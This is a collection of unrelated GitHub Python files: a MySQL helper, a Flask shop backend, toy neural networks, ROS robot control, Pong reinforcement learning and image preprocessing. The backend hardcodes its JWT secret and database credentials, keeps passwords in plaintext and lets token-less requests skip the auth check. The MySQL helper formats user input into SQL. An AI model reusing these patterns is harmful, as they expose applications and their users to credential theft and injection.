int(crsr.fetchone()[0])\n crsr.close()\n cnx.close()\n return i\n except Exception:\n return 0\n\n\n\ndef getMutationTypeID(s):\n\n try:\n cnx= getMySQLconnection()\n crsr = cnx.cursor()\n query = (\"select MutTypeID from mutation_type where MutName=\\'{}\\' limit 1\".format(s))\n crsr.execute(query)\n\n i= int(crsr.fetchone()[0])\n crsr.close()\n cnx.close()\n return i\n except Exception:\n return 0\n\n# print getMutationTypeID('SNP')","repo_name":"Sahilshetye/Breseq-Hansel-Porter","sub_path":"Hansel_HTMLscrapper/MySqlConnector.py","file_name":"MySqlConnector.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7531462861","text":"from flask import Flask, request, g, jsonify\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import create_engine\nfrom datetime import datetime, timedelta\nimport jwt\n\napp = Flask(__name__)\ndbURL = 'mysql://tt:admin@localhost/ecommerce'\napp.config['SQLALCHEMY_DATABASE_URI'] = dbURL\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nCORS(app)\napp.config['SECRET_KEY'] = 'GjIhOUzLBVs5CJ09j04KWg'\n\n\nclass Category(db.Model):\n __tablename__ = 'category'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255), unique=True, nullable=False)\n description = db.Column(db.Text, nullable=False)\n image = db.Column(db.Text, nullable=False)\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nclass Customer(db.Model):\n __tablename__ = 'customer'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n username = db.Column(db.String, nullable=False)\n password = db.Column(db.String, nullable=False)\n first_name = db.Column(db.String, nullable=False)\n last_name = db.Column(db.String, nullable=False)\n postal_code = db.Column(db.String, nullable=False)\n gender = db.Column(db.String, nullable=False)\n created_at = db.Column(db.Date, server_default=db.func.now())\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nclass Order(db.Model):\n __tablename__ = 'order'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n customer_id = db.Column(db.Integer, db.ForeignKey(\n 'customer.id', ondelete=\"CASCADE\", onupdate=\"CASCADE\"), nullable=False)\n status = db.Column(db.Integer, nullable=False)\n created_at = db.Column(db.DateTime, nullable=False,\n server_default=db.func.current_timestamp())\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nclass Order_item(db.Model):\n __tablename__ = 'order_item'\n product_id = db.Column(db.Integer, db.ForeignKey(\n 'product.id', ondelete=\"CASCADE\", onupdate=\"CASCADE\"), primary_key=True)\n order_id = db.Column(db.Integer, db.ForeignKey(\n 'order.id', ondelete=\"CASCADE\", onupdate=\"CASCADE\"), primary_key=True)\n product_qty = db.Column(db.Integer, server_default=None)\n total_price = db.Column(db.Float, server_default=None)\n\n def json(self):\n return {\"product_id\": self.product_id, \"product_qty\": self.product_qty, \"total_price\": self.total_price}\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nclass Product(db.Model):\n __tablename__ = 'product'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.Integer, nullable=False)\n price = db.Column(db.Float, nullable=False)\n description = db.Column(db.Integer, nullable=False)\n category_id = db.Column(db.Integer, db.ForeignKey(\n 'category.id', ondelete=\"CASCADE\", onupdate=\"CASCADE\"), nullable=False)\n image = db.Column(db.Integer, nullable=False)\n qty = db.Column(db.Integer, nullable=False)\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nengine = create_engine(dbURL)\ndb.create_all()\ndb.session.commit()\n\n\n@app.before_request\ndef before_request():\n if request.endpoint != 'login':\n token = request.headers.get('Authorization')\n if token:\n token = token.split()[1]\n if not checkjwt(token):\n return \"Unauthorised\", 403\n\n\ndef checkjwt(token):\n try:\n decoded = jwt.decode(token, app.config.get('SECRET_KEY'), options={\n \"require\": [\"exp\", \"iat\", \"sub\"]}, algorithms=[\"HS256\"])\n id = decoded['sub']\n g.user = Customer.query.filter_by(id=id).first()\n return g.user\n except:\n return None\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n payload = request.get_json()\n username = payload['username']\n password = payload['password']\n customer = Customer.query.filter_by(\n username=username, password=password).first()\n if customer:\n payload = {\n 'exp': datetime.utcnow() + timedelta(days=1),\n 'iat': datetime.utcnow(),\n 'sub': customer.id\n }\n return jwt.encode(payload, app.config.get('SECRET_KEY'), algorithm='HS256')\n else:\n return \"Unauthorised\", 403\n\n\ndef get_orderid(userid):\n existing_cart = Order.query.filter_by(\n customer_id=userid, status=0).first()\n if existing_cart:\n return existing_cart.id\n else:\n data = {\"customer_id\": userid, \"status\": 0}\n new_cart = Order(**data)\n db.session.add(new_cart)\n db.session.commit()\n return new_cart.id\n\n\n@app.route('/api/products')\ndef lst_products():\n products = Product.query.all()\n return jsonify([p.as_dict() for p in products])\n\n\n@app.route('/api/categories')\ndef lst_categories():\n categories = Category.query.all()\n return jsonify([c.as_dict() for c in categories])\n\n\n@app.route('/cart/retrieve', methods=['GET'])\ndef get_orderitems():\n order_id = get_orderid(g.user.id)\n return jsonify({\"order_items\": [orderitem.json() for orderitem in Order_item.query.filter_by(order_id=order_id).all()]})\n\n\n@app.route('/cart/insert', methods=['POST'])\ndef insert_orderitems():\n order_id = get_orderid(g.user.id)\n payload = request.get_json()\n product_id = payload['product_id']\n product_qty = int(payload['product_qty'])\n existing_item = Order_item.query.filter_by(\n order_id=order_id, product_id=product_id).first()\n if existing_item:\n product_qty += existing_item.product_qty\n price = float(Product.query.filter_by(id=product_id).first().price)\n data = {\"product_id\": product_id, \"order_id\": order_id,\n \"product_qty\": product_qty, \"total_price\": product_qty*price}\n db.session.merge(Order_item(**data))\n db.session.commit()\n return \"Inserted\", 200\n\n\n@app.route('/cart/delete', methods=['POST'])\ndef delete_orderitems():\n order_id = get_orderid(g.user.id)\n payload = request.get_json()\n product_id = payload['product_id']\n existing_item = Order_item.query.filter_by(\n order_id=order_id, product_id=product_id).first()\n db.session.delete(existing_item)\n db.session.commit()\n return \"Deleted\", 200\n\n\n@app.route('/cart/checkout', methods=['GET'])\ndef checkout():\n order_id = get_orderid(g.user.id)\n order_items = Order_item.query.filter_by(order_id=order_id).all()\n for item in order_items:\n product_id = item.product_id\n product_qty = int(item.product_qty)\n inventory_product = Product.query.filter_by(id=product_id).first()\n new_qty = int(inventory_product.qty) - product_qty\n inventory_product.qty = new_qty\n db.session.delete(item)\n order = Order.query.filter_by(id=order_id).first()\n order.status = 1\n db.session.commit()\n return \"Checked out\", 200\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, threaded=True)\n","repo_name":"Marco-SKN/TT1_Group_16","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21587170308","text":"import numpy as np \nimport time \n\nn_hidden = 10\nn_in = 10\nn_out = 10\n\nn_sample = 300\n\n#hyper parameter\nlearning_rate = 0.01\nmomemtum = 0.9\n\n#non deterministic seeding\nnp.random.seed(0)\n\n#sigmoid activation\ndef sigmoid(x):\n\treturn 1.0/(1.0 + np.exp(-x))\n\n#tangent activation\ndef tanh(x):\n\treturn 1-np.tanh(x)**2\n\n#training\n#x is input\n#t is transpose for matrix multiplication\n#V and W are layers(1 and 2)\n#bv and bw are biases for each layer\ndef train(x, t, V, W, bv, bw):\n\t#forward propogation\n\tA = np.dot(x, V) + bv #matrix multiply + bias\n\tZ = np.tanh(A)\n\n\tB = np.dot(Z, W) + bw\n\tY = sigmoid(B)\n\n\t#back propogation\n\tEw = Y - t\n\tEv = tanh(A) * np.dot(W, Ew)\n\n\t#predict loss\n\tdW = np.outer(Z, Ew)\n\tdV = np.outer(x, Ev)\n\n\t#cross entroy for classification(gives better than Mean square)\n\tloss = -np.mean(t * np.log(Y) + (1 - t) * np.log(1-Y))\n\n\treturn loss, (dV, dW, Ev, Ew)\n\ndef predict(x, V, W, bv, bw):\n\tA = np.dot(x ,V) + bv\n\tB = np.dot(np.tanh(A), W) + bw\n\treturn (sigmoid(B) > 0.5).astype(int)\n\n\n#create layers\nV = np.random.normal(scale=0.1, size=(n_in, n_hidden))\nW = np.random.normal(scale=0.1, size=(n_hidden, n_out))\n\n\nbv = np.zeros(n_hidden)\nbw = np.zeros(n_out)\n\nparams = [V , W, bv, bw]\n\n#generate data\nX = np.random.binomial(1,0.5,(n_sample,n_in))\nT = X ^ 1\n\n#Training\nfor epoch in range(100):\n\terr = []\n\tupd = [0]*len(params)\n\n\tt0 = time.clock()\n\n\t#for each data point update weights\n\tfor i in range(X.shape[0]):\n\t\tloss,grad = train(X[i], T[i], *params)\n\t\t#update loss\n\t\tfor j in range(len(params)):\n\t\t\tparams[j] -= upd[j]\n\n\t\tfor j in range(len(params)):\n\t\t\tupd[j] = learning_rate * grad[j] + momemtum * upd[j]\n\n\t\terr.append(loss)\n\n\tprint('Epoch:%d, Loss: %.8f, Time: %.4fs'%(epoch, np.mean(err), time.clock()-t0))\n\n\n#try to predict some shit\n\nx = np.random.binomial(1, 0.5, n_in)\nprint('XOR Prediction')\nprint(x)\nprint(predict(x,*params))\n\n","repo_name":"Navi-nk/Python","sub_path":"neuralNet.py","file_name":"neuralNet.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908720770","text":"#Author : Edwin Samuels\r\n#Student number : SMLEDW002\r\n#Date : 20 April 2014\r\n#Function : adds multiplies and normalises vectors\r\n#Title : Question2\r\n\r\nfrom math import *\r\n\r\n\r\ndef vector_add(vectora, vectorb):\r\n\r\n \"\"\"Returns the sum of two vectors in the form of a list\"\"\"\r\n\r\n vector_sum = []\r\n for i in range(3):\r\n #adds the the sum of each component to a new list\r\n vector_sum.append(vectora[i] + vectorb[i])\r\n\r\n return vector_sum\r\n\r\n\r\ndef vector_multiplier(vectora, vectorb):\r\n\r\n \"\"\"Returns the dot product of two vectors in the form of a list \"\"\"\r\n\r\n vector_multiplied = []\r\n for i in range(3):\r\n #adds the the product of each component to a new list\r\n vector_multiplied.append(vectora[i] * vectorb[i])\r\n\r\n return sum(vector_multiplied)\r\n\r\n\r\ndef vector_normalization(vector):\r\n\r\n \"\"\"Determines the norm of a vector\"\"\"\r\n\r\n sum_squared = 0\r\n index_no = 0\r\n\r\n for i in range(3):\r\n sum_squared += (vector[index_no]) ** 2\r\n index_no += 1\r\n return \"{0:.2f}\".format(sqrt(sum_squared))\r\n\r\n#Gets a vector in the form of a list of digits\r\n\r\nvector_A = list(map(eval, (input(\"Enter vector A:\\n\").split())))\r\n\r\nvector_B = list(map(eval, (input(\"Enter vector B:\\n\").split())))\r\n\r\nprint(\"A+B =\", vector_add(vector_A, vector_B))\r\nprint(\"A.B =\", vector_multiplier(vector_A, vector_B))\r\nprint(\"|A| =\", vector_normalization(vector_A))\r\nprint(\"|B| =\", vector_normalization(vector_B))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/smledw002/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28035834529","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split # eğitim-test bölünmesi\nfrom sklearn.linear_model import LogisticRegression\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndata = pd.read_csv(\"ortopedik_hastaların_biyomekanik_özellikleri.csv\")\nprint(data.head())\n\n# Sınıf sayılarını hesaplayarak yeni bir Seri oluşturalım\nclass_counts = data[\"class\"].value_counts()\n\n# Sınıf sayılarını içeren Seriyi kullanarak görselleştirme yapın\nplt.figure(figsize=(8, 6))\nsns.barplot(x=class_counts.index, y=class_counts.values)\nplt.title(\"Sınıf Dağılımı\")\nplt.xlabel(\"Class\")\nplt.ylabel(\"Output\")\nplt.xticks(rotation=45)\nplt.show()\n\n#abnormal = 1, normal = 0\ndata[\"class\"] = [1 if each == \"Abnormal\" else 0 for each in data[\"class\"]]\ndata.head()\nprint(data.info())\n\ny = data[\"class\"].values\nx_data = data.drop([\"class\"],axis=1)\n\nsns.pairplot(x_data)\nplt.show()\n\n# Veriyi normalize etmeliyiz her bir veriyi 0 ile 1 arasında sıkıştırmalıyız\nx = (x_data - np.min(x_data)) / (np.max(x_data) - np.min(x_data)).values\nprint(x)\n\n# %85 trainig, %15 test\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size= 0.15, random_state=42)\n\n# transpose alıyoruz\nx_train = x_train.T\nx_test = x_test.T\ny_train = y_train.T\ny_test = y_test.T\n\nprint(\"x_train: \", x_train.shape)\nprint(\"x_test: \", x_test.shape)\nprint(\"y_train: \", y_train.shape)\nprint(\"y_test: \", y_test.shape)\n\n# eğitim\nlr = LogisticRegression()\nlr.fit(x_train.T, y_train.T)\nprint(lr)\n\n# test\ntest_dogrulugu = lr.score(x_test.T, y_test.T)\nprint(\"Test Doğruluğu: {}\".format(test_dogrulugu))\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"htasoftware99/MachineLearningAlgorithms","sub_path":"Regression/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22262752961","text":"import random\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import String\n\nclass Turtlebot:\n def __init__(self, name):\n self.name = name\n self.move_random = Twist()\n self.pub_cmd_vel = rospy.Publisher(f\"/{name}/cmd_vel\", Twist, queue_size=10)\n self.pub_location = rospy.Publisher(\"/turtlebot_locations\", String, queue_size=10)\n self.sub_scan = rospy.Subscriber(f\"/{name}/scan\", LaserScan, self.callback)\n self.sub_odom = rospy.Subscriber(f\"/{name}/odom\", Odometry, self.odom_callback)\n self.sub_location = rospy.Subscriber(\"/turtlebot_locations\", String, self.location_callback)\n\n def callback(self, laser):\n threshold = 1\n random_velocity_linear_x = random.randint(-5, 5)\n random_velocity_angualr_z = random.randint(-5, 5)\n\n if laser.ranges[0] > threshold and laser.ranges[15] > threshold and laser.ranges[345] > threshold:\n if random_velocity_linear_x > 0:\n self.move_random.linear.x = random_velocity_linear_x\n self.move_random.angular.z = random_velocity_angualr_z\n else:\n self.move_random.linear.x = 0\n self.move_random.angular.z = random_velocity_angualr_z\n else:\n if random_velocity_linear_x > 0:\n self.move_random.linear.x = 0.0\n self.move_random.angular.z = random_velocity_angualr_z\n else:\n self.move_random.linear.x = random_velocity_linear_x\n self.move_random.angular.z = 0\n\n if laser.ranges[0] > threshold and laser.ranges[15] > threshold and laser.ranges[345] > threshold:\n self.move_random.linear.x = random_velocity_linear_x\n self.move_random.angular.z = 0.0\n\n self.pub_cmd_vel.publish(self.move_random)\n\n def odom_callback(self, odom):\n location_data = f\"{self.name}: {odom.pose.pose.position.x}, {odom.pose.pose.position.y}\"\n self.pub_location.publish(location_data)\n\n def location_callback(self, location_data):\n if not location_data.data.startswith(self.name):\n print(f\"{self.name} received location data: {location_data.data}\")\n\ndef stop_turtlebots(turtlebots):\n stop_twist = Twist()\n for tb in turtlebots:\n tb.pub.publish(stop_twist)\n print(\"shutdown time!\")\n\nif __name__ == \"__main__\":\n rospy.init_node('trying_to_avoidance_obestacle')\n rate = rospy.Rate(10)\n\n turtlebot_names = ['tb3_0', 'tb3_1', 'tb3_2']\n turtlebots = [Turtlebot(name) for name in turtlebot_names]\n\n rospy.on_shutdown(lambda: stop_turtlebots(turtlebots))\n \n try:\n rospy.spin()\n except:\n print(\"error\")\n","repo_name":"ebagirma/Multi-Robot-Path-Planning","sub_path":"src/turtlebot_navigation_and_mapping/nodes/move_random.py","file_name":"move_random.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19441825372","text":"# Code from Karpathy's \"Pong From Pixels\" with additional\n# comments to explain what different parts of the program do.\n\n\nimport numpy as np #matrix math\nimport pickle #serializing data (save/load model)\nimport gym #atari environment\n\n\n# no hard coded rules\n# algorithm, not environment\n# 1) receive image from the game (game STATE)\n# 2) binary decision - move paddle up or down\n# 3) make an action, receive a reward\n# Action list: +1 for getting ball past AI,\n# -1 for letting ball go past, 0 for any other action\n\n# general algorithm for any game\n# 2 layer neural network that takes in frames of the game (STATE),\n# output is a probablility value of whether to move up or down\n# we sample from probability value to get POLICY, getting gradient\n# as we backpropagate.\n\n#stochastic: non-deterministic, unpredictable, random, making decisions that are NOT predetermined.\n#adding variation into networks to try and mimic human behavior.\n#gradients == partial derivatives\n\n\n#hyperparameters\nH = 200 #number of hidden neurons\nbatch_size = 10 #number of episodes in a parameter update\nlearning_rate = 0.0001 #learning_rate\ngamma = 0.99 #discount factor (later rewards are less important, optimizing for short term)\ndecay_rate = 0.99 #RMSprop\nresume = False\n\n#init model\nD = 80 * 80 #input dimensionality\nif resume:\n model = pickle.load(open('save.p', 'rb'))\nelse:\n model = {}\n #initializing rates pseudo-randomly (Xavier initialization)\n #Xavier initialization: taking the hidden nodes into account\n #when we intialize nodes (http://andyljones.tumblr.com/post/110998971763/an-explanation-of-xavier-initialization)\n #W1: input D computed into some vector\n #W2: dealing only with hidden weights\n model['W1'] = np.random.randn(H,D) / np.sqrt(D)\n model['W2'] = np.random.randn(H) / np.sqrt(H)\n#gradient buffer helps with backpropagation. Used to store gradients.\ngrad_buffer = { k : np.zeros_like(v) for k,v in model.items() } \n## rmsprop (gradient descent) memory used to update model\nrmsprop_cache = { k : np.zeros_like(v) for k,v in model.items() } \n\n#activation function\n#sigmoid is used at end of backpropagation to return values as probabilities\ndef sigmoid(x):\n return 1.0 / (1.0 + np.exp(-x)) #squashing(converting vectors into probabilities)\n\n#preprocessing function: converts game image frame I into paddles and ball\ndef prepro(I):\n I = I[35:195] #cropping the game frame\n I = I[::2, ::2, 0] #downsampling by factor of 2\n I[I == 144] = 0 #erase background layer 1\n I[I == 109] = 0 #erase background layer 2\n I[I != 0] = 1 #paddles and balls set to 1\n return I.astype(np.float).ravel() #flatten\n\n#optimizing for short term rewards by weighing each reward differently by how early they occurred\n#source: https://github.com/hunkim/ReinforcementZeroToAll/issues/1\n#weighing immediate rewards higher than later rewards exponentially\n#short term: did the ball go past the AI paddle?\ndef discount_rewards(r):\n discounted_r = np.zeros_like(r)\n running_add = 0\n for t in reversed(range(0, r.size)):\n if r[t] != 0: running_add = 0\n #increment sum\n running_add = running_add * gamma + r[t]\n discounted_r[t] = running_add\n return discounted_r\n\n#forward propgation:\ndef policy_forward(x):\n h = np.dot(model['W1'], x)\n h[h < 0] = 0 #ReLU: take the max between 0 and h\n logp = np.dot(model['W2'], h)\n p = sigmoid(logp)\n return p, h #return propability of taking action 2 and hidstate\n\n#backpropagation: recursively compute error derivatives for both network layers (W1 and W2)\n#programatically the chain rule\n#epdlogp: modulate the _ with advantage\ndef policy_backward(eph,epdlogp):\n #eph is array of intermediate states\n #derivative wrt W2\n dw2 = np.dot(eph.T, epdlogp).ravel()\n dh = np.outer(epdlogp, model['W2'])\n dh[eph <= 0] = 0 #reLU\n #derivative wrt W1\n dw1 = np.dot(dh.T, epx)\n #return both derivatives to update weights\n return {'W1':dw1, 'W2':dw2}\n\n#implementation details\nenv = gym.make('Pong-v0')\nobservation = env.reset()\nprev_x = None\nxs, hs, dlogps, drs = [], [], [], []\nrunning_reward = None\nreward_sum = 0\nepisode_number = 0\n#print(\"Number of states\")\n#print(env.observation_space.n)\n\n\nwhile True:\n\n\n cur_x = prepro(observation)\n x = cur_x - prev_x if prev_x is not None else np.zeros(D)\n prev_x = cur_x\n\n\n\n aprob, h = policy_forward(x)\n action = 2 if np.random.uniform() < aprob else 3 # roll the dice!\n\n\n xs.append(x)\n hs.append(h)\n y = 1 if action == 2 else 0\n dlogps.append(y - aprob)\n\n #env.render()\n observation, reward, done, info = env.step(action)\n reward_sum += reward\n\n drs.append(reward)\n\n if done:\n episode_number += 1\n\n \n epx = np.vstack(xs) \n eph = np.vstack(hs) \n epdlogp = np.vstack(dlogps) \n epr = np.vstack(drs)\n xs,hs,dlogps,drs = [],[],[],[] \n\n \n discounted_epr = discount_rewards(epr)\n discounted_epr -= np.mean(discounted_epr)\n discounted_epr /= np.std(discounted_epr)\n\n\n epdlogp *= discounted_epr\n grad = policy_backward(eph, epdlogp)\n for k in model: grad_buffer[k] += grad[k] \n\n \n if episode_number % batch_size == 0:\n for k,v in model.items():\n g = grad_buffer[k] \n rmsprop_cache[k] = decay_rate * rmsprop_cache[k] + (1 - decay_rate) * g**2\n model[k] += learning_rate * g / (np.sqrt(rmsprop_cache[k]) + 1e-5)\n grad_buffer[k] = np.zeros_like(v)\n\n \n running_reward = reward_sum if running_reward is None else running_reward * 0.99 + reward_sum * 0.01\n print('resetting env. episode reward total was %f. running mean: %f' % (reward_sum, running_reward))\n if episode_number % 100 == 0: pickle.dump(model, open('save.p', 'wb'))\n reward_sum = 0\n observation = env.reset()\n prev_x = None\n\nprint(env.observation_space.n)\nif reward != 0:\n print ('ep %d: game finished, reward: %f' % (episode_number, reward)) + ('' if reward == -1 else ' !')\n","repo_name":"fxswiatowicz/cogs298-project","sub_path":"pong_commented_tutorial.py","file_name":"pong_commented_tutorial.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44075462710","text":"import argparse\nfrom pathlib import Path\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom os.path import join\nimport os\nimport shutil\nimport cv2 as cv\nfrom pca.nn_util import crop_silhouette_pair, verify_pose_variants_per_name, remove_pose_variant_in_file_name\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom multiprocessing import Pool\nfrom functools import partial\nimport tempfile\nfrom pca.pca_vic_model import PcaModel\nfrom sklearn.externals import joblib\nimport sklearn\nfrom common.util import find_largest_contour, smooth_contour, resample_contour\n\nlabel_colors = {'head':(128,0,0), 'torso':(255,85,0),\n 'larm':(51,170,221), 'rarm':(0,255,255),\n 'lleg_upper':(0,85,85,0), 'rleg_upper':(0,150,25),\n 'lleg_lower':(85,255,170), 'rleg_lower':(170,255,85),\n 'lfoot':(255,255,0), 'rfoot':(255,170,0)}\n\ndef body_part_mask(rgb_img, rgb_value, rgb_epsilon):\n if isinstance(rgb_epsilon, int):\n rgb_epsilon = (rgb_epsilon, rgb_epsilon, rgb_epsilon)\n\n r_mask = np.bitwise_and(rgb_img[:,:,0] > rgb_value[0]-rgb_epsilon[0], rgb_img[:,:,0] < rgb_value[0]+rgb_epsilon[0])\n g_mask = np.bitwise_and(rgb_img[:,:,1] > rgb_value[1]-rgb_epsilon[1], rgb_img[:,:,1] < rgb_value[1]+rgb_epsilon[1])\n b_mask = np.bitwise_and(rgb_img[:,:,2] > rgb_value[2]-rgb_epsilon[2], rgb_img[:,:,2] < rgb_value[2]+rgb_epsilon[2])\n mask = np.bitwise_and(r_mask, np.bitwise_and(g_mask, b_mask))\n return (mask*255).astype(np.uint8)\n\ndef extract_body_part_masks(img_rgb):\n body_masks = {}\n for k, v in label_colors.items():\n mask = body_part_mask(img_rgb, v, 10)\n body_masks[k] = mask\n return body_masks\n\ndef segment_body_part_sil_f(path):\n img = cv.imread(str(path))\n img = img[400:, :, ::-1]\n\n masks = extract_body_part_masks(img)\n img_1 = img.copy()\n contours = []\n for k, mask in masks.items():\n contour = find_largest_contour(mask, app_type=cv.CHAIN_APPROX_NONE)\n X, Y = smooth_contour(contour[:,0,0], contour[:,0,1], sigma=4)\n contour_1 = np.vstack([X,Y]).T\n contours.append(contour_1)\n cv.fillConvexPoly(img_1, contour_1.reshape(-1,1,2), color=label_colors[k])\n\n plt.subplot(121)\n plt.imshow(img)\n plt.subplot(122)\n plt.imshow(img_1)\n plt.show()\n\ndef copy_files(paths, out_dir, args):\n for path in Path(out_dir).glob('*.*'):\n os.remove(str(path))\n\n os.makedirs(out_dir, exist_ok=True)\n for path in tqdm(paths, desc=f'copied files to {out_dir}'):\n out_name = str(path.stem).replace('_front','')\n out_name = out_name.replace('_side', '')\n shutil.copy(src=path, dst=join(*[out_dir, f'{out_name}.jpg']))\n\ndef copy_train_valid_test(name_ids, id_to_path_dict, train_idxs, valid_idxs, test_idxs, out_dir, args):\n train_dir = join(*[out_dir, 'train'])\n valid_dir = join(*[out_dir, 'valid'])\n test_dir = join(*[out_dir, 'test'])\n\n copy_files([id_to_path_dict[name_ids[idx]] for idx in train_idxs], train_dir, args)\n copy_files([id_to_path_dict[name_ids[idx]] for idx in valid_idxs], valid_dir, args)\n copy_files([id_to_path_dict[name_ids[idx]] for idx in test_idxs], test_dir, args)\n\ndef extract_silhouette(img, background_I, epsilon):\n masks = []\n for i in range(3):\n m = np.bitwise_and(img[:,:,i] > background_I - epsilon, img[:, :, i] < background_I + epsilon)\n masks.append(m)\n\n mask = np.bitwise_and(np.bitwise_and(masks[0], masks[1]), masks[2])\n return np.bitwise_not(mask).astype(np.uint8)*255\n\ndef binarize_blender_img(img):\n # TODO: this value is very important. It must match with the background color from images generated by Blender\n background_intensity = 54\n epsilon = 5\n bi_img = extract_silhouette(img, background_intensity, epsilon)\n return bi_img\n\ndef crop_a_pair(size, path_pair):\n fpath = path_pair[0]\n spath = path_pair[1]\n\n img_f = cv.imread(str(fpath))\n img_s = cv.imread(str(spath))\n\n assert img_f is not None, f'{fpath} image does not exist'\n assert img_s is not None, f'{spath} image does not exist'\n\n sil_f = binarize_blender_img(img_f)\n sil_s = binarize_blender_img(img_s)\n\n # plt.subplot(121), plt.imshow(sil_f)\n # plt.subplot(122), plt.imshow(sil_s)\n # plt.show()\n\n sil_f, sil_s, _, _ = crop_silhouette_pair(sil_f, sil_s, mask_f=sil_f, mask_s=sil_s, target_h=size[0], target_w=size[1], px_height=int(0.9 * size[0]))\n #sil_f, sil_s = crop_silhouette_pair_blender(sil_f, sil_s, size)\n\n #plt.subplot(121), plt.imshow(sil_f)\n #plt.subplot(122), plt.imshow(sil_s)\n #plt.show()\n\n cv.imwrite(str(fpath), img=sil_f)\n cv.imwrite(str(spath), img=sil_s)\n\ndef erase_arm_side_profile(img_rgb):\n #arm color\n arm_rgb = (51, 170, 221)\n torso_rgb = (255, 86, 0)\n arm_mask = body_part_mask(img_rgb, arm_rgb, (5, 5, 5))\n arm_mask = cv.morphologyEx(arm_mask, cv.MORPH_DILATE, cv.getStructuringElement(cv.MORPH_RECT,(5,5)))\n arm_mask = arm_mask == 255\n img_rgb[arm_mask] = torso_rgb\n return img_rgb\n\ndef crop_a_pair_color(size, path_pair):\n fpath = path_pair[0]\n spath = path_pair[1]\n\n img_f = cv.imread(str(fpath))\n img_s = cv.imread(str(spath))\n\n assert img_f is not None, f'{fpath} image does not exist'\n assert img_s is not None, f'{spath} image does not exist'\n\n #TODO: hack. remove arm in the side profile\n img_s = erase_arm_side_profile(img_s[:,:,::-1])\n img_s = img_s[:,:,::-1]\n\n mask_f = binarize_blender_img(img_f)\n mask_s = binarize_blender_img(img_s)\n img_f[mask_f==0, :] = (0,0,0)\n img_s[mask_s==0, :] = (0,0,0)\n\n #plt.subplot(121), plt.imshow(img_f)\n #plt.subplot(122), plt.imshow(img_s)\n #plt.show()\n\n img_f, img_s, _, _ = crop_silhouette_pair(img_f, img_s, mask_f=mask_f, mask_s=mask_s, target_h=size[0], target_w=size[1], px_height=int(0.9 * size[0]))\n\n #plt.subplot(121), plt.imshow(img_f[:,:,::-1])\n #plt.subplot(122), plt.imshow(img_s[:,:,::-1])\n #plt.show()\n\n cv.imwrite(str(fpath), img=img_f)\n cv.imwrite(str(spath), img=img_s)\n\ndef crop_pairs(sil_f_dir, sil_s_dir, size, is_color):\n fpaths = sorted([path for path in Path(sil_f_dir).glob('*.*')])\n spaths = sorted([path for path in Path(sil_s_dir).glob('*.*')])\n for fpath, spath in zip(fpaths, spaths):\n assert fpath.name == spath.name\n\n path_pairs = [(fpath, spath) for fpath, spath in zip(fpaths, spaths)]\n\n pair_process_func = crop_a_pair_color if is_color else crop_a_pair\n\n with Pool(10) as p:\n with tqdm(total=len(path_pairs), desc=f'cropping pair. is_color = {is_color}: {Path(sil_f_dir).stem}, {Path(sil_s_dir).stem}') as pbar:\n for i, _ in enumerate(p.imap_unordered(partial(pair_process_func, size), path_pairs)):\n pbar.update()\n\ndef crop_train_test_valid(base_sil_f_dir, base_sil_s_dir, size, is_color):\n names = ['train', 'test', 'valid']\n for name in names:\n f_dir = join(*[base_sil_f_dir, name])\n s_dir = join(*[base_sil_s_dir, name])\n crop_pairs(f_dir, s_dir, size, is_color)\n\ndef copy_file_prefix(in_dir, out_dir, prefix, n_file = -1):\n os.makedirs(out_dir, exist_ok=True)\n\n paths = list([path for path in Path(in_dir).glob('*.*')])\n paths = sorted(paths)\n #paths = sklearn.utils.shuffle(paths)\n if n_file > 0:\n paths = paths[:n_file]\n\n for path in tqdm(paths, desc= f'copy_file_prefix {prefix}'):\n shutil.copy(str(path), os.path.join(*[out_dir, f'{prefix}_{path.name}']))\n\ndef copy_target_prefix(in_dir, out_dir, prefix, pose_duplicate = 